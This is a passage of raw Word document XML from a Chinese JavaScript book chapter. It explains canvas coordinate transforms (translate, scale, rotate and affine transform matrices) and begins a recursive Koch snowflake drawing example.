        <w:t>轴的值越大。一个翻转过的坐标系和代数课上经常使用的坐标系类似，它有助于在图表上面绘制数据点。但是要注意的是，它同时也让文本变的难以阅读。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>从数学角度来理解坐标系变换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>我发现从几何学的角度很容易理解坐标变换，把</w:t>
      </w:r>
      <w:r>
        <w:t>translate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法、</w:t>
      </w:r>
      <w:r>
        <w:t>rotate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以及</w:t>
      </w:r>
      <w:r>
        <w:t>scale()</w:t>
      </w:r>
      <w:r>
        <w:t>方法想象成如图</w:t>
      </w:r>
      <w:r>
        <w:t>21-7</w:t>
      </w:r>
      <w:r>
        <w:t>所示的对坐标轴的变换，就很容易理解了。从代数角度也很容易理解坐标变换，就是把变换想象成一个在变换后坐标系中的点</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>，到了原来的坐标系统就变成了</w:t>
      </w:r>
      <w:r>
        <w:t>(x',y')</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>c.translate(dx,dy)</w:t>
      </w:r>
      <w:r>
        <w:t>方法就等效于如下表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x'=x+dx;//</w:t>
      </w:r>
      <w:r>
        <w:t>新系统中</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴的</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，在原系统中就是</w:t>
      </w:r>
      <w:r>
        <w:t>dx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y'=y+dy;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4041475" cy="3959524"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="69" name="00069.jpeg" descr="000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69.jpeg" descr="00069.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4041475" cy="3959524"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　坐标系变换</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>缩放操作也可以类似地作等效。调用</w:t>
      </w:r>
      <w:r>
        <w:t>c.scale(sx,sy)</w:t>
      </w:r>
      <w:r>
        <w:t>就等效于如下表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x'=sx*x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y'=sy*y;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>旋转操作则相对比较复杂。调用</w:t>
      </w:r>
      <w:r>
        <w:t>c.rotate(a)</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过三角法则等效于如下表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x'=x*cos(a)-y*sin(a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y'=y*cos(a)+x*sin(a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是，坐标系变换是与顺序相关的。假设从画布默认的坐标系开始，然后进行变换，再进行伸缩。如此操作之后，要想将现有坐标系中的点</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>映射成默认坐标系中的点</w:t>
      </w:r>
      <w:r>
        <w:t>(x'',y'')</w:t>
      </w:r>
      <w:r>
        <w:t>，必须首先应用等效的缩放等式把该点映射到未缩放坐标系中的一个中间点</w:t>
      </w:r>
      <w:r>
        <w:t>(x',y')</w:t>
      </w:r>
      <w:r>
        <w:t>，然后再使用等效的变换来将中间点再映射到原来坐标系中的点</w:t>
      </w:r>
      <w:r>
        <w:t>(x'',y'')</w:t>
      </w:r>
      <w:r>
        <w:t>。结果如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x''=sx*x+dx;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y''=sy*y+dy;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果先调用</w:t>
      </w:r>
      <w:r>
        <w:t>scal()</w:t>
      </w:r>
      <w:r>
        <w:t>方法再调用</w:t>
      </w:r>
      <w:r>
        <w:t>translate()</w:t>
      </w:r>
      <w:r>
        <w:t>的话，那等效的结果就不同了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x''=sx*(x+</w:t>
      </w:r>
      <w:r>
        <w:t>dx);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y''=sy*(y+dy);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里要记住的最重要的一点是：从代数的角度去思考坐标变换的时候，必须是进行反向还原变换的（以相反的顺序来进行等效的变换）。而从几何角度去思考坐标变换的时候，是顺序去做变换的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>画布支持的这种变换称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>仿射变换</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>affine transform</w:t>
      </w:r>
      <w:r>
        <w:t>）。仿射变换可能会修改点之间的距离和线段间的夹角，但是对于平行线而言，经过仿射变换后也始终保持平行</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>比如，不可能通过仿射变换来实现鱼眼镜头变形。任意的仿射变换可以利用</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>f 6</w:t>
      </w:r>
      <w:r>
        <w:t>个参数等效描述成如下形式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x'=ax+cy+e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y'=bx+dy+f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过向</w:t>
      </w:r>
      <w:r>
        <w:t>transform()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传递上述</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>个参数就可以应用任意仿射变换到当前的坐标系。图</w:t>
      </w:r>
      <w:r>
        <w:t>21-7</w:t>
      </w:r>
      <w:r>
        <w:t>展示的是两类变换</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>对指定点的扭曲和旋转</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>还可以像如下代码那样，使用</w:t>
      </w:r>
      <w:r>
        <w:t>transform()</w:t>
      </w:r>
      <w:r>
        <w:t>来实现相同的变换：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>扭曲变换</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//x'=x+kx*y;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//y'=y+ky*x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function shear(c,kx,ky){c.transform(1,ky,kx,1,0,0);}//</w:t>
      </w:r>
      <w:r>
        <w:t>沿着点</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>顺时针旋转</w:t>
      </w:r>
      <w:r>
        <w:t>theta</w:t>
      </w:r>
      <w:r>
        <w:t>角度（弧度制）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这也可以通过变换、旋转、变换序列操作来完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function rotateAbout(c,theta,x,y){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ct=Math.cos(theta),st=Math.sin(theta);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.transform(ct,-st,st,ct,-x*ct-y*st+x,x*st-y*ct+y);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setTransform()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>transform()</w:t>
      </w:r>
      <w:r>
        <w:t>方法接受同样的参数，但不同的是，前者不是对当前坐标系进行变换，而是对默认坐标系进行变换，并将结果映射到新的坐标系中。</w:t>
      </w:r>
      <w:r>
        <w:t>setTransform()</w:t>
      </w:r>
      <w:r>
        <w:t>对临时将画布重置为默认坐标系是很有用的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.save();//</w:t>
      </w:r>
      <w:r>
        <w:t>保存当前坐标系</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.setTransform(1,0,0,1,0,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>恢复到默认坐标系</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用默认的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素坐标进行操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.restore();//</w:t>
      </w:r>
      <w:r>
        <w:t>恢复保存的坐标系</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>坐标系变换例子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-6</w:t>
      </w:r>
      <w:r>
        <w:t>证明了坐标变换的威力：通过递归调用</w:t>
      </w:r>
      <w:r>
        <w:t>translate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法、</w:t>
      </w:r>
      <w:r>
        <w:t>rotate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以及</w:t>
      </w:r>
      <w:r>
        <w:t>scale()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来实现绘制科赫雪花分形。例</w:t>
      </w:r>
      <w:r>
        <w:t>21-6</w:t>
      </w:r>
      <w:r>
        <w:t>的结果如图</w:t>
      </w:r>
      <w:r>
        <w:t>21-8</w:t>
      </w:r>
      <w:r>
        <w:t>所示，展示了</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>不同分形级别的科赫雪花。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3989716" cy="1052422"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="70" name="00070.jpeg" descr="000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0.jpeg" descr="00070.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3989716" cy="1052422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　科赫雪花</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>实现这些雪花的代码是非常简洁优雅的，但是由于使用</w:t>
      </w:r>
      <w:r>
        <w:t>了递归坐标变换，因此代码会比较难懂。即便没有注意到所有这些细微区别，这里要注意的是，代码仅包含了对</w:t>
      </w:r>
      <w:r>
        <w:t>lineTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法单次调用。图</w:t>
      </w:r>
      <w:r>
        <w:t>21-8</w:t>
      </w:r>
      <w:r>
        <w:t>中的每一条线段都是通过如下方式来绘制的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineTo(len,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:t>变量的值在代码执行的过程中是不会改变的，因此，线段的位置、方向和长度完全通过变换、旋转以及缩放等操作来指定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-6</w:t>
      </w:r>
      <w:r>
        <w:t>：通过坐标系变换实现绘制科赫雪花</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var deg=Math.PI/180;//</w:t>
      </w:r>
      <w:r>
        <w:t>用于角度制到弧度制的转换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在画布的上下文</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>中，以左下角的点</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>和边长</w:t>
      </w:r>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:t>，绘</w:t>
      </w:r>
      <w:r>
        <w:t>制一个</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>级别的科赫雪花分形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function snowflake(c,n,x,y,len){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.save();//</w:t>
      </w:r>
      <w:r>
        <w:t>保存当前变换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.translate(x,y);//</w:t>
      </w:r>
      <w:r>
        <w:t>变换原点为起始点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(0,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>从新的原点开始一条新的子路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>leg(n);//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制雪花的第一条边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.rotate(-120*deg);//</w:t>
      </w:r>
      <w:r>
        <w:t>现在沿着逆时针方向旋转</w:t>
      </w:r>
      <w:r>
        <w:t>120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>leg(n);//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制第二条边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.rotate(-120*deg);//</w:t>
      </w:r>
      <w:r>
        <w:t>再次旋转</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>leg(n);//</w:t>
      </w:r>
      <w:r>
        <w:t>画最后一条边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.closePath();//</w:t>
      </w:r>
      <w:r>
        <w:t>闭合子路径</w:t>
      </w:r>
    </w:p>
